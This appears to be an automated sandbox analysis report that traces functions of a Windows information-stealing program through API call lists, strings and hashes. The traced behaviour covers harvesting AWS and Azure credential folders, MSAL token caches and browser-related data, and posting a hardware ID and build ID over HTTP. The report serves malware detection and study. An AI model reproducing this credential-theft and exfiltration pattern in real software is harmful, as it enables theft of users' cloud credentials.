                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000183000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.00000000001A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.00000000001C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000025A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676422716.0000000000290000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_20000_out.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: lstrlen$lstrcpy$Sleep
                                                                                                                                                                                          • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR$ERROR$Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0$Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0$sqlite3.dll$sqlite3.dll$sqlp.dll$sqlp.dll
                                                                                                                                                                                          • API String ID: 2840494320-608462545
                                                                                                                                                                                          • Opcode ID: 0b492593327e9d2aa980db89049b9621aa8fe981b9ee8170e5cb094c65ce4c4e
                                                                                                                                                                                          • Instruction ID: dc2645df1d984b55b23a005b86888151fd8c8065cbea92b61c3fc876688ab733
                                                                                                                                                                                          • Opcode Fuzzy Hash: 0b492593327e9d2aa980db89049b9621aa8fe981b9ee8170e5cb094c65ce4c4e
                                                                                                                                                                                          • Instruction Fuzzy Hash: 5591DA32E40128ABCF51FBA4ED46ADE7778AF04701F918161FD14BB153DB31AE4A8B91
                                                                                                                                                                                          Function 00021666 Relevance: 36.9, APIs: 18, Strings: 3, Instructions: 129memoryfileCOMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 2315 21666-2169e GetTempPathW 2316 216a4-216cb wsprintfW 2315->2316 2317 21809-2180b 2315->2317 2319 216d0-216f5 CreateFileW 2316->2319 2318 217fa-21808 call 3d016 2317->2318 2319->2317 2320 216fb-2174e GetProcessHeap RtlAllocateHeap _time64 srand rand call 43c10 WriteFile 2319->2320 2320->2317 2325 21754-2175a 2320->2325 2325->2317 2326 21760-2179c call 43c10 CloseHandle CreateFileW 2325->2326 2326->2317 2329 2179e-217b1 ReadFile 2326->2329 2329->2317 2330 217b3-217b9 2329->2330 2330->2317 2331 217bb-217f1 call 43c10 GetProcessHeap RtlFreeHeap CloseHandle 2330->2331 2331->2319 2334 217f7-217f9 2331->2334 2334->2318
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetTempPathW.KERNEL32(00000104,?), ref: 00021696
                                                                                                                                                                                          • wsprintfW.USER32 ref: 000216BC
                                                                                                                                                                                          • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000100,00000000), ref: 000216E6
                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000008,em" href="https://store.steampowered.com/">Home</a><a class="submenuitem" href="https://store.steampowered.com/explore/">Discovery Queue</a><a class="submenuitem" href="https://steamcommunit), ref: 000216FE
                                                                                                                                                                                          • RtlAllocateHeap.NTDLL(00000000), ref: 00021705
                                                                                                                                                                                          • _time64.MSVCRT ref: 0002170E
                                                                                                                                                                                          • srand.MSVCRT ref: 00021715
                                                                                                                                                                                          • rand.MSVCRT ref: 0002171E
                                                                                                                                                                                          • _memset.LIBCMT ref: 0002172E
                                                                                                                                                                                          • WriteFile.KERNEL32(?,00000000,em" href="https://store.steampowered.com/">Home</a><a class="submenuitem" href="https://store.steampowered.com/explore/">Discovery Queue</a><a class="submenuitem" href="https://steamcommunit,?,00000000), ref: 00021746
                                                                                                                                                                                          • _memset.LIBCMT ref: 00021763
                                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 00021771
                                                                                                                                                                                          • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,04000100,00000000), ref: 0002178D
                                                                                                                                                                                          • ReadFile.KERNEL32(00000000,00000000,em" href="https://store.steampowered.com/">Home</a><a class="submenuitem" href="https://store.steampowered.com/explore/">Discovery Queue</a><a class="submenuitem" href="https://steamcommunit,?,00000000), ref: 000217A9
                                                                                                                                                                                          • _memset.LIBCMT ref: 000217BE
                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,00000000), ref: 000217C8
                                                                                                                                                                                          • RtlFreeHeap.NTDLL(00000000), ref: 000217CF
                                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 000217DB
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2676109470.0000000000021000.00000080.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2676092931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676135055.0000000000050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676150175.000000000005D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000007D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000008B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000017D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000183000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.00000000001A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.00000000001C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000025A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676422716.0000000000290000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_20000_out.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: FileHeap$_memset$CloseCreateHandleProcess$AllocateFreePathReadTempWrite_time64randsrandwsprintf
                                                                                                                                                                                          • String ID: %s%s$delays.tmp$em" href="https://store.steampowered.com/">Home</a><a class="submenuitem" href="https://store.steampowered.com/explore/">Discovery Queue</a><a class="submenuitem" href="https://steamcommunit
                                                                                                                                                                                          • API String ID: 1620473967-1213961506
                                                                                                                                                                                          • Opcode ID: 74e9a2e3e133632533fc67db334c39b0b311d758214594a90a0f6b4de6d29861
                                                                                                                                                                                          • Instruction ID: 57ba8179cfec4d9b42a53b0caa31907802a2be7f397825f9cff341157eccbb6f
                                                                                                                                                                                          • Opcode Fuzzy Hash: 74e9a2e3e133632533fc67db334c39b0b311d758214594a90a0f6b4de6d29861
                                                                                                                                                                                          • Instruction Fuzzy Hash: BF4184B1900328ABEB205F71AC4DFEF7BBDEB99712F1005A9B50AE1091DA354954CF64
                                                                                                                                                                                          Function 00024B2E Relevance: 33.6, APIs: 12, Strings: 7, Instructions: 378networkstringfileCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 00030519: lstrcpyA.KERNEL32(00000000,?,?,00021D07,?,00037621), ref: 00030538
                                                                                                                                                                                            • Part of subcall function 00024AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00024AE8
                                                                                                                                                                                            • Part of subcall function 00024AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00024AEE
                                                                                                                                                                                            • Part of subcall function 00024AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00024AF4
                                                                                                                                                                                            • Part of subcall function 00024AB6: lstrlenA.KERNEL32(000000FF,00000000,?), ref: 00024B06
                                                                                                                                                                                            • Part of subcall function 00024AB6: InternetCrackUrlA.WININET(000000FF,00000000), ref: 00024B0E
                                                                                                                                                                                            • Part of subcall function 000304E7: lstrcpyA.KERNEL32(00000000,00000000,?,0003707B,000566CD,?,?,?,?,0003858F), ref: 0003050D
                                                                                                                                                                                          • InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 00024BCD
                                                                                                                                                                                          • StrCmpCA.SHLWAPI(?), ref: 00024BEB
                                                                                                                                                                                          • InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00024D83
                                                                                                                                                                                          • HttpOpenRequestA.WININET(?,?,00000000,00000000,?,00000000), ref: 00024DC7
                                                                                                                                                                                          • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00024DF5
                                                                                                                                                                                            • Part of subcall function 00030609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0003709C,00056C18,00000000,000566CD,?,?,?,?,0003858F), ref: 0003061D
                                                                                                                                                                                            • Part of subcall function 00030609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0003709C,00056C18,00000000,000566CD,?,?,?,?,0003858F), ref: 00030645
                                                                                                                                                                                            • Part of subcall function 00030609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0003709C,00056C18,00000000,000566CD,?,?,?,?,0003858F), ref: 00030650
                                                                                                                                                                                            • Part of subcall function 0003058D: lstrcpyA.KERNEL32(00000000,?,00000000,000370BA,00056C18,00000000,000566CD,?,?,?,?,0003858F), ref: 000305BD
                                                                                                                                                                                            • Part of subcall function 000305C7: lstrcpyA.KERNEL32(00000000,?,0000000C,000375E9,000566DA), ref: 000305F5
                                                                                                                                                                                            • Part of subcall function 000305C7: lstrcatA.KERNEL32(?,?), ref: 000305FF
                                                                                                                                                                                          • lstrlenA.KERNEL32(?,00056953,",build_id,000577C4,------,000577B8,",hwid,000577A4,------), ref: 000250EE
                                                                                                                                                                                          • lstrlenA.KERNEL32(?,?,00000000), ref: 00025101
                                                                                                                                                                                          • HttpSendRequestA.WININET(00000000,?,00000000), ref: 0002510F
                                                                                                                                                                                          • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 0002516C
                                                                                                                                                                                          • InternetCloseHandle.WININET(00000000), ref: 00025177
                                                                                                                                                                                          • InternetCloseHandle.WININET(?), ref: 0002518E
                                                                                                                                                                                          • InternetCloseHandle.WININET(?), ref: 0002519A
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2676109470.0000000000021000.00000080.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2676092931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676135055.0000000000050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676150175.000000000005D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000007D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000008B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000017D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000183000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.00000000001A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.00000000001C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000025A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676422716.0000000000290000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_20000_out.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileOptionReadSend
                                                                                                                                                                                          • String ID: "$"$------$------$------$build_id$hwid
                                                                                                                                                                                          • API String ID: 3006978581-3960666492
                                                                                                                                                                                          • Opcode ID: 0a021abd1818ba27d648da5cbde69c04c0fa9ffb46f2f918f8323fb795531ef1
                                                                                                                                                                                          • Instruction ID: 960ed48afc04399fa70add89dea7eec6d475d34d968355728bf18d01221741cc
                                                                                                                                                                                          • Opcode Fuzzy Hash: 0a021abd1818ba27d648da5cbde69c04c0fa9ffb46f2f918f8323fb795531ef1
                                                                                                                                                                                          • Instruction Fuzzy Hash: EC028431D5612A9ACF21EB60DC52ADEB7B8FF08300F4581E1A94C77156DA747E8A8FD0
                                                                                                                                                                                          Function 000364BD Relevance: 33.4, APIs: 10, Strings: 9, Instructions: 114stringCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • _memset.LIBCMT ref: 000364E2
                                                                                                                                                                                            • Part of subcall function 00031DBC: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 00031DFD
                                                                                                                                                                                          • lstrcatA.KERNEL32(?,00000000,?,00000000,?), ref: 00036501
                                                                                                                                                                                          • lstrcatA.KERNEL32(?,\.azure\), ref: 0003651E
                                                                                                                                                                                            • Part of subcall function 00035FD1: wsprintfA.USER32 ref: 00036018
                                                                                                                                                                                            • Part of subcall function 00035FD1: FindFirstFileA.KERNEL32(?,?), ref: 0003602F
                                                                                                                                                                                            • Part of subcall function 00035FD1: StrCmpCA.SHLWAPI(?,00056AB4), ref: 00036050
                                                                                                                                                                                            • Part of subcall function 00035FD1: StrCmpCA.SHLWAPI(?,00056AB8), ref: 0003606A
                                                                                                                                                                                            • Part of subcall function 00035FD1: wsprintfA.USER32 ref: 00036091
                                                                                                                                                                                            • Part of subcall function 00035FD1: StrCmpCA.SHLWAPI(?,00056647), ref: 000360A5
                                                                                                                                                                                            • Part of subcall function 00035FD1: wsprintfA.USER32 ref: 000360C2
                                                                                                                                                                                            • Part of subcall function 00035FD1: PathMatchSpecA.SHLWAPI(?,?), ref: 000360EF
                                                                                                                                                                                            • Part of subcall function 00035FD1: lstrcatA.KERNEL32(?), ref: 00036125
                                                                                                                                                                                            • Part of subcall function 00035FD1: lstrcatA.KERNEL32(?,00056AD0), ref: 00036137
                                                                                                                                                                                            • Part of subcall function 00035FD1: lstrcatA.KERNEL32(?,?), ref: 0003614A
                                                                                                                                                                                            • Part of subcall function 00035FD1: lstrcatA.KERNEL32(?,00056AD4), ref: 0003615C
                                                                                                                                                                                            • Part of subcall function 00035FD1: lstrcatA.KERNEL32(?,?), ref: 00036170
                                                                                                                                                                                          • _memset.LIBCMT ref: 00036556
                                                                                                                                                                                          • lstrcatA.KERNEL32(?,00000000), ref: 00036578
                                                                                                                                                                                          • lstrcatA.KERNEL32(?,\.aws\), ref: 00036595
                                                                                                                                                                                            • Part of subcall function 00035FD1: wsprintfA.USER32 ref: 000360D9
                                                                                                                                                                                            • Part of subcall function 00035FD1: CopyFileA.KERNEL32(?,?,00000001), ref: 00036229
                                                                                                                                                                                            • Part of subcall function 00035FD1: DeleteFileA.KERNEL32(?), ref: 0003629D
                                                                                                                                                                                            • Part of subcall function 00035FD1: FindNextFileA.KERNEL32(?,?), ref: 000362FF
                                                                                                                                                                                            • Part of subcall function 00035FD1: FindClose.KERNEL32(?), ref: 00036313
                                                                                                                                                                                          • _memset.LIBCMT ref: 000365CA
                                                                                                                                                                                          • lstrcatA.KERNEL32(?,00000000), ref: 000365EC
                                                                                                                                                                                          • lstrcatA.KERNEL32(?,\.IdentityService\), ref: 00036609
                                                                                                                                                                                          • _memset.LIBCMT ref: 0003663E
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2676109470.0000000000021000.00000080.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2676092931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676135055.0000000000050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676150175.000000000005D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000007D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000008B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000017D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000183000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.00000000001A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.00000000001C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000025A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676422716.0000000000290000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_20000_out.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: lstrcat$File_memsetwsprintf$Find$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                                                                                                                                                                                          • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                                                                                                                                                                                          • API String ID: 780282842-974132213
                                                                                                                                                                                          • Opcode ID: a08bcb866d3855fc6401c809d068d57594ca373981eacdb07932b6d961e7aa2e
                                                                                                                                                                                          • Instruction ID: dc1f8866fba2ceb63ab00cb6dcf93c8e199b6d13ad12bd916eebd89f7e4e1d1c
                                                                                                                                                                                          • Opcode Fuzzy Hash: a08bcb866d3855fc6401c809d068d57594ca373981eacdb07932b6d961e7aa2e
                                                                                                                                                                                          • Instruction Fuzzy Hash: 0641B675D4022CABDF15E760EC4BFDE737CAB08701F9444A5BB04A7192EAB19AC88F51
                                                                                                                                                                                          Function 0002ABE5 Relevance: 33.3, APIs: 22, Instructions: 315stringmemoryfileCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 000304E7: lstrcpyA.KERNEL32(00000000,00000000,?,0003707B,000566CD,?,?,?,?,0003858F), ref: 0003050D
                                                                                                                                                                                            • Part of subcall function 00031C4A: GetSystemTime.KERNEL32(?,00056701,?), ref: 00031C79
                                                                                                                                                                                            • Part of subcall function 00030609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0003709C,00056C18,00000000,000566CD,?,?,?,?,0003858F), ref: 0003061D
                                                                                                                                                                                            • Part of subcall function 00030609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0003709C,00056C18,00000000,000566CD,?,?,?,?,0003858F), ref: 00030645
                                                                                                                                                                                            • Part of subcall function 00030609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0003709C,00056C18,00000000,000566CD,?,?,?,?,0003858F), ref: 00030650
                                                                                                                                                                                            • Part of subcall function 000305C7: lstrcpyA.KERNEL32(00000000,?,0000000C,000375E9,000566DA), ref: 000305F5
                                                                                                                                                                                            • Part of subcall function 000305C7: lstrcatA.KERNEL32(?,?), ref: 000305FF
                                                                                                                                                                                            • Part of subcall function 0003058D: lstrcpyA.KERNEL32(00000000,?,00000000,000370BA,00056C18,00000000,000566CD,?,?,?,?,0003858F), ref: 000305BD
                                                                                                                                                                                          • CopyFileA.KERNEL32(?,?,00000001), ref: 0002AC8A
                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0002AD94
                                                                                                                                                                                          • RtlAllocateHeap.NTDLL(00000000), ref: 0002AD9B
                                                                                                                                                                                          • StrCmpCA.SHLWAPI(?,000573DC,00000000), ref: 0002AE4C
                                                                                                                                                                                          • StrCmpCA.SHLWAPI(?,000573E0), ref: 0002AE74
                                                                                                                                                                                          • lstrcatA.KERNEL32(00000000,?), ref: 0002AE98
                                                                                                                                                                                          • lstrcatA.KERNEL32(00000000,000573E4), ref: 0002AEA4
                                                                                                                                                                                          • lstrcatA.KERNEL32(00000000,?), ref: 0002AEAE
                                                                                                                                                                                          • lstrcatA.KERNEL32(00000000,000573E8), ref: 0002AEBA
                                                                                                                                                                                          • lstrcatA.KERNEL32(00000000,?), ref: 0002AEC4
                                                                                                                                                                                          • lstrcatA.KERNEL32(00000000,000573EC), ref: 0002AED0
                                                                                                                                                                                          • lstrcatA.KERNEL32(00000000,?), ref: 0002AEDA
                                                                                                                                                                                          • lstrcatA.KERNEL32(00000000,000573F0), ref: 0002AEE6
                                                                                                                                                                                          • lstrcatA.KERNEL32(00000000,?), ref: 0002AEF0
                                                                                                                                                                                          • lstrcatA.KERNEL32(00000000,000573F4), ref: 0002AEFC
                                                                                                                                                                                          • lstrcatA.KERNEL32(00000000,?), ref: 0002AF06
                                                                                                                                                                                          • lstrcatA.KERNEL32(00000000,000573F8), ref: 0002AF12
                                                                                                                                                                                          • lstrcatA.KERNEL32(00000000,?), ref: 0002AF1C
                                                                                                                                                                                          • lstrcatA.KERNEL32(00000000,000573FC), ref: 0002AF28
                                                                                                                                                                                          • lstrlenA.KERNEL32(00000000), ref: 0002AF7A
                                                                                                                                                                                          • lstrlenA.KERNEL32(?), ref: 0002AF95
                                                                                                                                                                                          • DeleteFileA.KERNEL32(?), ref: 0002AFD8
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2676109470.0000000000021000.00000080.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2676092931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676135055.0000000000050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676150175.000000000005D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000007D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000008B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000017D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000183000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.00000000001A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.00000000001C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000025A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676422716.0000000000290000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_20000_out.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1956182324-0
                                                                                                                                                                                          • Opcode ID: 4657ac083c7fae2e9edcc6dc5bc500fac0faef63cc25ac2145d6ab8d611d5c19
                                                                                                                                                                                          • Instruction ID: 04a4a02b7bfbae56e90d521622fa9653e7a47439f95884e67c6880a300fd41ee
                                                                                                                                                                                          • Opcode Fuzzy Hash: 4657ac083c7fae2e9edcc6dc5bc500fac0faef63cc25ac2145d6ab8d611d5c19
                                                                                                                                                                                          • Instruction Fuzzy Hash: 38C10A32904118EFDF12ABA0FC4A8EE7B79EF08315F514065FA05B7062DB316E869F61
                                                                                                                                                                                          Function 00037041 Relevance: 30.8, APIs: 8, Strings: 9, Instructions: 1029networksleepCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 000304E7: lstrcpyA.KERNEL32(00000000,00000000,?,0003707B,000566CD,?,?,?,?,0003858F), ref: 0003050D
                                                                                                                                                                                            • Part of subcall function 00030C53: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,000213B9), ref: 00030C5F
                                                                                                                                                                                            • Part of subcall function 00030C53: HeapAlloc.KERNEL32(00000000,?,?,?,000213B9), ref: 00030C66
                                                                                                                                                                                            • Part of subcall function 00030C53: GetUserNameA.ADVAPI32(00000000,000213B9), ref: 00030C7A
                                                                                                                                                                                            • Part of subcall function 00030609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0003709C,00056C18,00000000,000566CD,?,?,?,?,0003858F), ref: 0003061D
                                                                                                                                                                                            • Part of subcall function 00030609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0003709C,00056C18,00000000,000566CD,?,?,?,?,0003858F), ref: 00030645
                                                                                                                                                                                            • Part of subcall function 00030609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0003709C,00056C18,00000000,000566CD,?,?,?,?,0003858F), ref: 00030650
                                                                                                                                                                                            • Part of subcall function 0003058D: lstrcpyA.KERNEL32(00000000,?,00000000,000370BA,00056C18,00000000,000566CD,?,?,?,?,0003858F), ref: 000305BD
                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000,?,?,?,?,0003858F), ref: 000370DD
                                                                                                                                                                                          • OpenEventA.KERNEL32(esvchost.exesvchost.exesvchost.exesvchost.exeOfficeClickToRun.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesihost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exectfmon.exe,00000000,?,00056C18,00000000,000566CD,?,?,?,?,0003858F), ref: 000370EC
                                                                                                                                                                                          • CreateDirectoryA.KERNEL32(?,00000000,000566DA), ref: 0003760A
                                                                                                                                                                                          • InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 000376CB
                                                                                                                                                                                          • InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 000376E4
                                                                                                                                                                                            • Part of subcall function 00024B2E: InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 00024BCD
                                                                                                                                                                                            • Part of subcall function 00024B2E: StrCmpCA.SHLWAPI(?), ref: 00024BEB
                                                                                                                                                                                            • Part of subcall function 000339C2: StrCmpCA.SHLWAPI(?,block,?,?,00037744), ref: 000339D7
                                                                                                                                                                                            • Part of subcall function 000339C2: ExitProcess.KERNEL32 ref: 000339E2
                                                                                                                                                                                            • Part of subcall function 00025F39: InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 00025FD8
                                                                                                                                                                                            • Part of subcall function 00025F39: StrCmpCA.SHLWAPI(?), ref: 00025FF6
